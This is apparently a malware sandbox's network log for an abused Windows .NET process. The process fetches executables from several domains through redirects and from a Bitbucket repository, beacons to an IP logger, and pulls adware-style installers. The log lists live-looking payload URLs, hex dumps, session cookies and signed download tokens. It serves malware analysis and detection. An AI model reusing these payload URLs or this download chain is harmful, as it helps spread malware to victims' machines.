                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:55 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Cache-Control: no-cache, private
                                                                                                                                                                                                                                                            Set-Cookie: XSRF-TOKEN=eyJpdiI6Ii9lN2kwTDJjVWVwNlFBMDY5TXVCWmc9PSIsInZhbHVlIjoiSVZsenp6OWpENXBCNWVyMkV6MkRYbXhEaG1INFpTOFRvUUtpVzUzV3hIMFEySXJsam5RNXBNdXFkVkI5UkhNS3h1ZU9xcEU3cWk1YXRtcGdaZmpBRU83Yjg5a0ZSdlRzb1BtcXJsYy95T05GNE52U3B1Z1pSOWNLSWpjcUtBQkUiLCJtYWMiOiI4M2IyNDk1YjA5NzgwNzAzNzE5NzQ2NzA4YmI0N2VhZjY3YzlmMjM1M2EyMzZlOWQ4YzdjODI0Njc5ZTUwNjgyIiwidGFnIjoiIn0%3D; expires=Mon, 11 Mar 2024 04:30:55 GMT; Max-Age=7200; path=/; secure
                                                                                                                                                                                                                                                            set-cookie: shortiny_session=eyJpdiI6ImZOeFVCMjJaVGhtWmpZaXN1bXN1V2c9PSIsInZhbHVlIjoieVpSeGZyaWhWRXNXeHZNcDF6Q09TbnRRR0o1emFmek5Dc0ZMdGV2QVN3cjdxeVk2MGZoaE1wWWIwTnJxV0NlbTZOcHE4bE9tODRoL0J4ZTZxZnFhaVRwNlJZN09EeXFuMStTbXhXeHAvakVQQXJBbTRXYXVzNUJhZ01taXY0NnAiLCJtYWMiOiI2MWQyMWVmZDQyMDNlYzA3NDI2YjRlZTFjMzczMzYyNmFiOWI2N2I0Y2IwODUyNmRmYjljOWVkZmNiNWQ0MGYxIiwidGFnIjoiIn0%3D; expires=Mon, 11 Mar 2024 04:30:55 GMT; Max-Age=7200; path=/; httponly
                                                                                                                                                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                            Strict-Transport-Security: max-age=15768000
                                                                                                                                                                                                                                                            CF-Cache-Status: DYNAMIC


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
10 | 192.168.2.5 | 55574 | 172.67.178.183 | 443 | 4264 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
Timestamp | Bytes transferred | Direction | Data
2024-03-11 02:30:54 UTC | 98 | OUT | GET /6779d89b7a368f4f3f340b50a9d18d71.exe HTTP/1.1
                                                                                                                                                                                                                                                            Host: namemail.org
                                                                                                                                                                                                                                                            Connection: Keep-Alive
2024-03-11 02:30:55 UTC | 695 | IN | HTTP/1.1 307 Temporary Redirect
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:55 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Location: https://ittrade.org/26b626fea29015a9f24e07a08fa011e4/6779d89b7a368f4f3f340b50a9d18d71.exe
                                                                                                                                                                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Qj7UHzpM6pwNLwvE%2FENVTfnuYOC%2Fq3EL%2BAJ1lobj7cKQVoYcUyGN%2FYclWPZ1QWjggjd7fpuLEO%2BgQUhSkOXtBO5SS8c3UC%2FPf9IhE%2FCkjaUsBR7GrvfBrMKYrIzpsbQ%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            CF-RAY: 8628200fe9bd0ad3-LAS
                                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
11 | 192.168.2.5 | 55573 | 172.67.178.183 | 443 | 4264 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
Timestamp | Bytes transferred | Direction | Data
2024-03-11 02:30:54 UTC | 98 | OUT | GET /6779d89b7a368f4f3f340b50a9d18d71.exe HTTP/1.1
                                                                                                                                                                                                                                                            Host: namemail.org
                                                                                                                                                                                                                                                            Connection: Keep-Alive
2024-03-11 02:30:55 UTC | 681 | IN | HTTP/1.1 307 Temporary Redirect
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:55 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Location: https://ittrade.org/26b626fea29015a9f24e07a08fa011e4/6779d89b7a368f4f3f340b50a9d18d71.exe
                                                                                                                                                                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dPBAVIWijFGV3DZnLb9lL3zPtJ8gLF2YiACXgxHBy3eIFErycxYx5YPqDgO1rJuJ3WPHhzcgByX7bIZD0GZgEUZtq0C5odS8I5BYQ5eySIcxiVWRbyCf77yIvOGKQ7Q%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            CF-RAY: 8628200fed8d0add-LAS
                                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
12 | 192.168.2.5 | 55568 | 104.192.141.1 | 443 | 4264 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
Timestamp | Bytes transferred | Direction | Data
2024-03-11 02:30:54 UTC | 107 | OUT | GET /j-upsps/microsoft_network1/downloads/a02.exe HTTP/1.1
                                                                                                                                                                                                                                                            Host: bitbucket.org
                                                                                                                                                                                                                                                            Connection: Keep-Alive
2024-03-11 02:30:55 UTC | 4235 | IN | HTTP/1.1 302 Found
                                                                                                                                                                                                                                                            server: envoy
                                                                                                                                                                                                                                                            x-usage-quota-remaining: 998923.634
                                                                                                                                                                                                                                                            vary: Accept-Language, Origin
                                                                                                                                                                                                                                                            x-usage-request-cost: 1093.87
                                                                                                                                                                                                                                                            cache-control: max-age=0, no-cache, no-store, must-revalidate, private
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                            x-b3-traceid: cdfe773aebaabd3e
                                                                                                                                                                                                                                                            x-usage-output-ops: 0
                                                                                                                                                                                                                                                            x-used-mesh: False
                                                                                                                                                                                                                                                            x-dc-location: Micros-3
                                                                                                                                                                                                                                                            content-security-policy: base-uri 'self'; default-src 'self' 'unsafe-inline' 'unsafe-eval' data: blob: *; connect-src bitbucket.org *.bitbucket.org bb-inf.net *.bb-inf.net id.atlassian.com api.atlassian.com api.stg.atlassian.com wss://bitbucketci-ws-service.services.atlassian.com/ wss://bitbucketci-ws-service.stg.services.atlassian.com/ wss://bitbucketci-ws-service.dev.services.atlassian.com/ analytics.atlassian.com as.atlassian.com api-private.stg.atlassian.com api-private.atlassian.com atl-global.atlassian.com cofs.staging.public.atl-paas.net cofs.prod.public.atl-paas.net fd-assets.prod.atl-paas.net flight-deck-assets-bifrost.prod-east.frontend.public.atl-paas.net intake.opbeat.com api.media.atlassian.com api.segment.io xid.statuspage.io xid.atlassian.com xid.sourcetreeapp.com bam.nr-data.net bam-cell.nr-data.net www.google-analytics.com sentry.io *.ingest.sentry.io events.launchdarkly.com app.launchdarkly.com fd-config.us-east-1.prod.public.atl-paas.net fd-config-bifrost.prod-east.frontend.public.atl-paas.net app.pendo.io data.pendo.io pendo-static-6266914010103808.storage.googleapis.com bqlf8qjztdtr.statuspage.io https://d301sr5gafysq2.cloudfront.net/ https://d136azpfpnge1l.cloudfront.net/; script-src 'unsafe-eval' 'strict-dynamic' 'unsafe-inline' 'self' http: https: https://remote-app-switcher.stg-east.frontend.public.atl-paas.net https://remote-app-switcher.prod-east.frontend.public.atl-paas.net app.pendo.io cdn.pendo.io data.pendo.io pendo-io-static.storage.googleapis.com pendo-static-6266914010103808.storage.googleapis.com https://d301sr5gafysq2.cloudfront.net/ https://d136azpfpnge1l.cloudfront.net/; style-src 'self' 'unsafe-inline' https://aui-cdn.atlassian.com/ https://cdn.cookielaw.org/ app.pendo.io 
cdn.pendo.io pendo-static-6266914010103808.storage.googleapis.com https://d301sr5gafysq2.cloudfront.net/ https://d136azpfpnge1l.cloudfront.net/; object-src 'none'; frame-ancestors 'self' start.atlassian.com start.stg.atlassian.com atlaskit.atlassian.com bitbucket.org app.pendo.io; report-uri https://web-security-reports.services.atlassian.com/csp-report/bb-website
                                                                                                                                                                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:54 GMT
                                                                                                                                                                                                                                                            x-usage-user-time: 0.032816
                                                                                                                                                                                                                                                            x-usage-system-time: 0.000000
                                                                                                                                                                                                                                                            location: https://bbuseruploads.s3.amazonaws.com/fe3c402e-d650-43c9-b0ce-c95a11498dde/downloads/666d2627-f56a-4f04-99c5-36905368220f/a02.exe?response-content-disposition=attachment%3B%20filename%3D%22a02.exe%22&AWSAccessKeyId=ASIA6KOSE3BNBZE7SCMA&Signature=HCpifs76QUiUci%2FEbjTZ%2FcagJHI%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEBsaCXVzLWVhc3QtMSJHMEUCIAL7XL1t3TuPO88R%2FvmGOKGVl7p1Es82eho6cXvQ48VmAiEA7oowtGrg0V2iUhUFhl6H%2Ftflg%2F8yqqvEVz4QKWlhh9IqpwIIJBAAGgw5ODQ1MjUxMDExNDYiDFuIFyQ4tKa%2Be%2FeNTyqEAv3z8s9kfwkGDgSePx2WLCQQKhHTHvRODYsmqld%2BfnPf1j4E%2BbYhYHOLhh0iQz0sdVxhkrXPTKBqSsozj19VUfDopIPVTfRKMeNtRGQezfK2JjXbp8r7euC55noDSYZTIVM6KVVDIPF1tAGWJiFo6%2BMYnFfB2zug1t5HpisPVtMAStx8BqdelSlN37IFcwjn1aKq5iLKOG2ot6gDBMcne8C1p0SybdfD5uWEI6lrqrxtbWm19RY1WYFsJSDkbGmC0LCmMTNlAcqxgj5rGPqMkl4XffgOsPi8NIW0liFniEJ4GkgdiP0nldGzH%2BkY77zsgPaug81QSVfxWv673OeelwZ6wdBpMNTYua8GOp0B8L9l%2BRuxjpbF79wIHItOL1FbFFaPMDUqLn7BHl2kHWntZrPtX5IlaRgQbEYZGTx9IwOvskFyhN7gOZfzOo5jKzjap2b%2Bq12UXPXW48Biok56nWPXv6z27x4KbZddnlzzmD%2FmLERbURyUQwhok2kY3h9GfMX4MN0PiCzQ9hqyr2Z7uiRWWK82G8AlU01254WlEwld0nRAsugFGjj4nw%3D%3D&Expires=1710125916
                                                                                                                                                                                                                                                            expires: Mon, 11 Mar 2024 02:30:54 GMT
                                                                                                                                                                                                                                                            x-served-by: 0e7b622335b4
                                                                                                                                                                                                                                                            x-envoy-upstream-service-time: 71
                                                                                                                                                                                                                                                            content-language: en
                                                                                                                                                                                                                                                            x-view-name: bitbucket.apps.downloads.views.download_file
                                                                                                                                                                                                                                                            x-b3-spanid: cdfe773aebaabd3e
                                                                                                                                                                                                                                                            x-static-version: 3c039d08312e
                                                                                                                                                                                                                                                            x-render-time: 0.060658931732177734
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            x-usage-input-ops: 0
                                                                                                                                                                                                                                                            x-version: 3c039d08312e
                                                                                                                                                                                                                                                            x-request-count: 3743
                                                                                                                                                                                                                                                            x-frame-options: SAMEORIGIN
                                                                                                                                                                                                                                                            X-Cache-Info: not cacheable; response specified "Cache-Control: no-cache"
                                                                                                                                                                                                                                                            Content-Length: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
13 | 192.168.2.5 | 55575 | 172.67.188.178 | 443 | 4264 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
Timestamp | Bytes transferred | Direction | Data
2024-03-11 02:30:54 UTC | 67 | OUT | GET /1lyxz HTTP/1.1
                                                                                                                                                                                                                                                            Host: iplogger.com
                                                                                                                                                                                                                                                            Connection: Keep-Alive
2024-03-11 02:30:55 UTC | 1146 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:55 GMT
                                                                                                                                                                                                                                                            Content-Type: image/png
                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            set-cookie: 505282792584766758=3; expires=Tue, 11 Mar 2025 02:30:55 GMT; Max-Age=31536000; path=/; secure; HttpOnly; SameSite=Strict
                                                                                                                                                                                                                                                            set-cookie: clhf03028ja=154.16.105.38; expires=Tue, 11 Mar 2025 02:30:55 GMT; Max-Age=31536000; path=/; secure; HttpOnly; SameSite=Strict
                                                                                                                                                                                                                                                            memory: 0.42150115966796875
                                                                                                                                                                                                                                                            expires: Mon, 11 Mar 2024 02:30:55 +0000
                                                                                                                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                            strict-transport-security: max-age=604800
                                                                                                                                                                                                                                                            strict-transport-security: max-age=31536000
                                                                                                                                                                                                                                                            content-security-policy: img-src https: data:; upgrade-insecure-requests
                                                                                                                                                                                                                                                            x-frame-options: SAMEORIGIN
                                                                                                                                                                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=ToL073Rcs3YTrTnhHbgXO4WVBFHTlgf8sII%2B9z89lt8YBsrNcCb3v2VZEzvwyZquB%2FogWK7oNKSnKgpf1MQpnnOxXmApniVhY%2FbRxTYlIZMB6YN%2BhD3Z0Am5Mit%2BXpc%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            CF-RAY: 8628201139ed09ed-LAS
                                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                            2024-03-11 02:30:55 UTC218INData Raw: 64 34 0d 0a 0a 57 61 72 6e 69 6e 67 3a 20 55 6e 64 65 66 69 6e 65 64 20 70 72 6f 70 65 72 74 79 3a 20 64 65 76 69 63 65 3a 3a 24 75 61 20 69 6e 20 2f 68 6f 6d 65 2f 77 77 77 2f 6c 6f 67 67 65 72 73 2f 6c 69 62 73 2f 64 65 76 69 63 65 2e 63 6c 61 73 73 2e 70 68 70 20 6f 6e 20 6c 69 6e 65 20 37 35 0a 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 01 00 00 00 01 01 03 00 00 00 25 db 56 ca 00 00 00 03 50 4c 54 45 00 00 00 a7 7a 3d da 00 00 00 01 74 52 4e 53 00 40 e6 d8 66 00 00 00 09 70 48 59 73 00 00 0e c4 00 00 0e c4 01 95 2b 0e 1b 00 00 00 0a 49 44 41 54 08 99 63 60 00 00 00 02 00 01 f4 71 64 a6 00 00 00 00 49 45 4e 44 ae 42 60 82 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: d4Warning: Undefined property: device::$ua in /home/www/loggers/libs/device.class.php on line 75PNGIHDR%VPLTEz=tRNS@fpHYs+IDATc`qdIENDB`
                                                                                                                                                                                                                                                            2024-03-11 02:30:55 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
14 | 192.168.2.5 | 55572 | 104.21.32.142 | 443 | 4264 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
Timestamp | Bytes transferred | Direction | Data
2024-03-11 02:30:54 UTC | 103 | OUT | GET /baf14778c246e15550645e30ba78ce1c.exe HTTP/1.1
                                                                                                                                                                                                                                                            Host: shipofdestiny.com
                                                                                                                                                                                                                                                            Connection: Keep-Alive
2024-03-11 02:30:55 UTC | 705 | IN | HTTP/1.1 307 Temporary Redirect
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:55 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Location: https://lawyerbuyer.org/26b626fea29015a9f24e07a08fa011e4/baf14778c246e15550645e30ba78ce1c.exe
                                                                                                                                                                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=3mdwQfSn3sIeONCq36VrfNfxZE9QOFqz744rPa3AXqHSXbyGkCl2q%2BEQt4BPImJNUQ%2FsEbE%2BchLmYj2Rt7KyGJFKC01R9UJ35qhknF3M7%2Fe0i6UwcYCvLy%2BFKmrW0QzheOJE2g%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            CF-RAY: 862820128fc30ad5-LAS
                                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                            2024-03-11 02:30:55 UTC135INData Raw: 38 31 0d 0a 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6c 61 77 79 65 72 62 75 79 65 72 2e 6f 72 67 2f 32 36 62 36 32 36 66 65 61 32 39 30 31 35 61 39 66 32 34 65 30 37 61 30 38 66 61 30 31 31 65 34 2f 62 61 66 31 34 37 37 38 63 32 34 36 65 31 35 35 35 30 36 34 35 65 33 30 62 61 37 38 63 65 31 63 2e 65 78 65 22 3e 54 65 6d 70 6f 72 61 72 79 20 52 65 64 69 72 65 63 74 3c 2f 61 3e 2e 0a 0a 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: 81<a href="https://lawyerbuyer.org/26b626fea29015a9f24e07a08fa011e4/baf14778c246e15550645e30ba78ce1c.exe">Temporary Redirect</a>.
                                                                                                                                                                                                                                                            2024-03-11 02:30:55 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
15 | 192.168.2.5 | 55571 | 104.21.32.142 | 443 | 4264 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
Timestamp | Bytes transferred | Direction | Data
2024-03-11 02:30:54 UTC | 103 | OUT | GET /baf14778c246e15550645e30ba78ce1c.exe HTTP/1.1
                                                                                                                                                                                                                                                            Host: shipofdestiny.com
                                                                                                                                                                                                                                                            Connection: Keep-Alive
2024-03-11 02:30:55 UTC | 703 | IN | HTTP/1.1 307 Temporary Redirect
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:55 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Location: https://lawyerbuyer.org/26b626fea29015a9f24e07a08fa011e4/baf14778c246e15550645e30ba78ce1c.exe
                                                                                                                                                                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=LJ0mzSaRNkSoepLcvuDuZ%2Fy8D8KBgFXFeHRqS5Hpb5iGLBlhmJSEACHqUx2PK0LwOTv9A2RZp%2BmQECykplwEVfVVlcvcQkRKnNEKdRFF8dRH5ggZqza8drqlHtmg%2FjUMfBb%2FjQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            CF-RAY: 862820128df709f3-LAS
                                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                            2024-03-11 02:30:55 UTC135INData Raw: 38 31 0d 0a 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6c 61 77 79 65 72 62 75 79 65 72 2e 6f 72 67 2f 32 36 62 36 32 36 66 65 61 32 39 30 31 35 61 39 66 32 34 65 30 37 61 30 38 66 61 30 31 31 65 34 2f 62 61 66 31 34 37 37 38 63 32 34 36 65 31 35 35 35 30 36 34 35 65 33 30 62 61 37 38 63 65 31 63 2e 65 78 65 22 3e 54 65 6d 70 6f 72 61 72 79 20 52 65 64 69 72 65 63 74 3c 2f 61 3e 2e 0a 0a 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: 81<a href="https://lawyerbuyer.org/26b626fea29015a9f24e07a08fa011e4/baf14778c246e15550645e30ba78ce1c.exe">Temporary Redirect</a>.
                                                                                                                                                                                                                                                            2024-03-11 02:30:55 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
16 | 192.168.2.5 | 55580 | 107.167.110.211 | 443 | 4264 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
Timestamp | Bytes transferred | Direction | Data
2024-03-11 02:30:55 UTC | 135 | OUT | GET /opera/stable/windows/?utm_medium=apb&utm_source=mkt&utm_campaign=767 HTTP/1.1
                                                                                                                                                                                                                                                            Host: net.geo.opera.com
                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                            2024-03-11 02:30:56 UTC322INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:55 GMT
                                                                                                                                                                                                                                                            Content-Type: application/octet-stream
                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Content-Disposition: attachment; filename=OperaSetup.exe
                                                                                                                                                                                                                                                            ETag: "ec88d954c697b2110ec5b86a8d0a21d7"
                                                                                                                                                                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            17192.168.2.555581107.167.110.21144344264C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            2024-03-11 02:30:55 UTC135OUTGET /opera/stable/windows/?utm_medium=apb&utm_source=mkt&utm_campaign=767 HTTP/1.1
                                                                                                                                                                                                                                                            Host: net.geo.opera.com
                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                            2024-03-11 02:30:56 UTC322INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:55 GMT
                                                                                                                                                                                                                                                            Content-Type: application/octet-stream
                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Content-Disposition: attachment; filename=OperaSetup.exe
                                                                                                                                                                                                                                                            ETag: "6b0b042dd7fc05b282c63d2958ab7d0c"
                                                                                                                                                                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                                                                                                                                                            Data Ascii: BG9u1Ga1@Np?W1&#U)Wi@_,P9/M12p1B9u^>F\9??7EF#9tf9rwuv9`vOu~h<9/un>0%?80]P@#$MAu'
                                                                                                                                                                                                                                                            2024-03-11 02:30:57 UTC16384INData Raw: 8e 40 fe 5f 58 8b ac 8b 75 a8 8b 7d b0 89 7d d4 0c 16 13 60 e0 53 8b b0 b1 f8 b2 72 fc 69 80 7d d3 7a 06 0b 57 04 a6 7a c7 c6 3e 2c c6 10 bc 77 80 7d 97 10 8c 42 21 40 43 31 e3 00 41 20 e9 53 88 01 80 25 c0 53 a6 88 00 37 b5 00 66 3a 8b 7d b8 55 87 00 21 09 6d 55 66 09 f4 08 f0 39 45 e0 0f 56 04 05 ab f7 5c 18 0e 8e 32 33 08 97 35 16 b1 82 ff 0f 45 90 c5 90 00 0f 3c 7f 20 16 a9 b0 f5 2e 22 18 50 12 4f 34 05 29 b6 c8 6f 34 8a 0a 0c 38 88 06 df 97 2e 08 97 a4 d6 0f d4 2e 0a 7e 07 d9 80 78 0b 00 78 15 86 29 a8 e9 ab 4e fe 00 15 06 8a b1 2a 30 f0 14 00 04 1a 0a 1b 16 fb 00 e9 9c eb eb 47 04 3f 7c 55 00 19 ee 7f 20 97 00 35 02 dc c7 b9 e5 fe 47 46 01 b7 4d e0 c7 01 00 04 da 24 08 55 75 e0 25 b0 00 b4 ff 55 84 a8 4c bc 79 08 8b 5d d4 41 f5 7f 53 6a 85 f6 75 30
                                                                                                                                                                                                                                                            Data Ascii: @_Xu}}`Sri}zWz>,w}B!@C1A S%S7f:}U!mUf9EV\235E< ."PO4)o48..~xx)N*0G?|U 5GFM$Uu%ULy]ASju0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
18 | 192.168.2.5 | 55584 | 172.67.177.133 | 443 | 4264 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
Timestamp | Bytes transferred | Direction | Data
2024-03-11 02:30:55 UTC | 130 | OUT | GET /26b626fea29015a9f24e07a08fa011e4/6779d89b7a368f4f3f340b50a9d18d71.exe HTTP/1.1
                                                                                                                                                                                                                                                            Host: ittrade.org
                                                                                                                                                                                                                                                            Connection: Keep-Alive
2024-03-11 02:30:56 UTC | 673 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:56 GMT
                                                                                                                                                                                                                                                            Content-Type: application/x-ms-dos-executable
                                                                                                                                                                                                                                                            Content-Length: 4283768
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Last-Modified: Sun, 10 Mar 2024 22:52:57 GMT
                                                                                                                                                                                                                                                            Cache-Control: max-age=14400
                                                                                                                                                                                                                                                            CF-Cache-Status: MISS
                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=R5AtUpGWLPlZjJi9evFtiY6GAs83k16yzGD8wVS85IM%2BxJ778oqtBoYWDCYwNlvZ%2BJUQSeHA7sRYTNYLfkrMY9ODgGEdLUM9%2BtYXMMgilgmyItjRDf8e%2BnSZJY404A%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            CF-RAY: 86282017aca90adb-LAS
                                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
19 | 192.168.2.5 | 55583 | 172.67.177.133 | 443 | 4264 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
Timestamp | Bytes transferred | Direction | Data
2024-03-11 02:30:55 UTC | 130 | OUT | GET /26b626fea29015a9f24e07a08fa011e4/6779d89b7a368f4f3f340b50a9d18d71.exe HTTP/1.1
                                                                                                                                                                                                                                                            Host: ittrade.org
                                                                                                                                                                                                                                                            Connection: Keep-Alive
2024-03-11 02:30:56 UTC | 678 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:56 GMT
                                                                                                                                                                                                                                                            Content-Type: application/x-ms-dos-executable
                                                                                                                                                                                                                                                            Content-Length: 4283768
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Last-Modified: Sun, 10 Mar 2024 22:52:57 GMT
                                                                                                                                                                                                                                                            Cache-Control: max-age=14400
                                                                                                                                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                                                                                                                                            Age: 0
                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=gLcPmtDFkmnyN7MeQbgOzBaTEazb%2FkXNCir5OGLa7Fp92yvRiRDPZL7FBt3UEC7Ftgov3KWazJnc5kM0U601%2BCIdtTN5XPMLhocn4ZfT0wZVx72o%2BsUPtwGgEoA2ig%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            CF-RAY: 86282017ad3009f3-LAS
                                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                            Data Ascii: ju]jjjjjjzUKuYhh@d5D$l$l$+SVW1E3PeuEEEEdMdY__^[]QUS]Vs35WEE{tN38NF38E@f
